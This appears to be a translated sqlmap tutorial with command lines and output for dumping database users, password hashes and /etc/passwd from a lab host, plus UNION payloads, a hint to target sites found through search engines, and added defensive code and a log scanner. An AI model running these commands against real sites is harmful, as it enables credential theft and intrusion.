1. First install Python 2.5.
2. Then change into the sqlmap directory and run sqlmap.

Detailed usage

1. sqlmap -u <injection point>
2. sqlmap -g "keyword"  // this injects through Google search results; it does not work at the moment, I don't know why; you can simply change it to Baidu instead
3. python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1

[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
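The log above reports the 'id' parameter as "numeric/unescaped injectable". As an added example (not from the original post and not sqlmap's code), the following Python snippet reproduces that pattern against a constructed in-memory SQLite table standing in for the query behind page.php, and puts the hardened form beside it. The two probe values produce different responses only from the unsafe version, which is exactly the difference sqlmap's test observes; the validated, parameterised version rejects them before any SQL runs. The table, column names and sample rows are invented.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the article's testdb (invented schema)."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE pages (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)')
    conn.executemany('INSERT INTO pages VALUES (?, ?, ?)',
                     [(1, 2, 'welcome'), (2, 2, 'about'), (3, 5, 'contact')])
    return conn


def lookup_unsafe(conn, id_param):
    """The numeric/unescaped pattern from the log: the raw query-string value is
    pasted into the SQL text. Because the column is numeric there are no quotes
    around the value, so nothing has to be escaped for extra SQL to be parsed."""
    sql = "SELECT title FROM pages WHERE id = %s" % id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    """Hardened form: validate the type first, then bind the value as a parameter
    so the driver never interprets it as SQL."""
    try:
        page_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    rows = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # Unsafe: a true and a false condition appended to the id yield different pages.
    print(lookup_unsafe(db, "1"))            # ['welcome']
    print(lookup_unsafe(db, "1 AND 1=1"))    # ['welcome']
    print(lookup_unsafe(db, "1 AND 1=2"))    # []
    # Safe: the same input never reaches the database.
    print(lookup_safe(db, "1"))              # ['welcome']
    try:
        lookup_safe(db, "1 AND 1=2")
    except ValueError as exc:
        print("rejected:", exc)
```

The response difference between the second and third unsafe calls is the whole signal a blind test needs, which is why the fix has to be structural (type validation plus bound parameters) rather than a filter on particular keywords.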

4. Inject into a specified parameter

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"

[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]

Or if you want to provide more than one parameter, for instance:

$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"

5. Specify the HTTP method and the POST data
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

6. Specify a cookie, so that pages requiring a login can be injected
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"

7. Inject through a proxy
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"
8. Specify a keyword string; it can also be omitted, in which case the program decides automatically from the hash of the response
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"
9. Specify the database type, so it does not have to guess among the other DBMSs; this improves efficiency
--remote-dbms
10. Fingerprint the database type
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11. Retrieve the banner
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b

banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

12. Retrieve the current database, the current user, all users, passwords, and all available databases
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db

current database: 'testdb'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users

database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs

available databases [3]:
[*] information_schema
[*] mysql
[*] testdb

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"

Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"

Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+

13. Display the contents of a specified file (generally used against PHP)
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd

/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---

14. Execute your own SQL statement

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"

[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'

15. UNION injection
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-check

valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --union-use --banner

[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
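The request logged above wraps VERSION() between two CHAR() sequences; decoded, those byte lists are sqlmap's __START__ and __STOP__ markers, which let it cut its own output out of the page. As an added example (not part of the original post and not sqlmap's code), here is a small Python access-log scanner for the web-server side: it URL-decodes each request path, expands CHAR() calls back to text, and flags UNION SELECT probes, those markers, boolean probes of the "AND 1=2" kind from section 3, and the sqlmap/ prefix of sqlmap's default User-Agent (easily overridden by an operator, so treat it as a weak signal). The log lines are constructed in Apache combined format, and the "sqlmap/0.6" User-Agent value in them is an invented sample.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log in Apache combined format. The third line carries the
# UNION request from the article's log, URL-encoded as a server would record it.
SAMPLE_LOG = r'''
10.0.0.5 - - [12/Mar/2009:14:02:11 +0000] "GET /page.php?id=1&cat=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2009:14:02:12 +0000] "GET /page.php?id=1%20AND%201=2&cat=2 HTTP/1.1" 200 318 "-" "sqlmap/0.6"
10.0.0.9 - - [12/Mar/2009:14:02:13 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20CONCAT(CHAR(95,95,83,84,65,82,84,95,95),%20VERSION(),%20CHAR(95,95,83,84,79,80,95,95)),%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# CHAR(95,95,83,...) style calls, as used in the article's UNION request
CHAR_RE = re.compile(r'CHAR\(\s*((?:\d+\s*,\s*)*\d+)\s*\)', re.IGNORECASE)
UNION_RE = re.compile(r'\bUNION\s+(?:ALL\s+)?SELECT\b', re.IGNORECASE)
# "AND 1=2" / "OR 1=1" style conditions appended to a numeric value
BOOLEAN_RE = re.compile(r'\b(?:AND|OR)\s+\d+\s*=\s*\d+', re.IGNORECASE)


def decode_char_calls(text):
    """Replace every CHAR(n,n,...) call with the string those codes spell."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(',')]
        return ''.join(chr(c) for c in codes)
    return CHAR_RE.sub(repl, text)


def analyse_request(path, user_agent):
    """Return (decoded path, list of reasons) for one request."""
    decoded = decode_char_calls(unquote_plus(path))
    reasons = []
    if user_agent.lower().startswith('sqlmap'):
        reasons.append('sqlmap-user-agent')
    if UNION_RE.search(decoded):
        reasons.append('union-select')
    if '__START__' in decoded or '__STOP__' in decoded:
        reasons.append('sqlmap-union-marker')
    if BOOLEAN_RE.search(decoded):
        reasons.append('boolean-probe')
    return decoded, reasons


def scan_log(lines):
    """Parse combined-format lines and return the requests that raised a flag."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in combined format
        decoded, reasons = analyse_request(match.group('path'), match.group('ua'))
        if reasons:
            findings.append({'ip': match.group('ip'), 'path': decoded, 'reasons': reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding['ip'], ', '.join(finding['reasons']))
        print('   ', finding['path'])
```

Matching on the decoded form matters: the raw log line contains neither "__START__" nor a literal space-separated "UNION ALL SELECT", so a rule over the undecoded request text would miss both. The same scanner can be fed a real access log line by line.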

16. Save the injection session to a file, and later resume it from that file. Very convenient, one of the big features: you can interrupt an injection and carry on when you have time.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -o "sqlmap.log"

[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --banner -o "sqlmap.log" --resume

[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
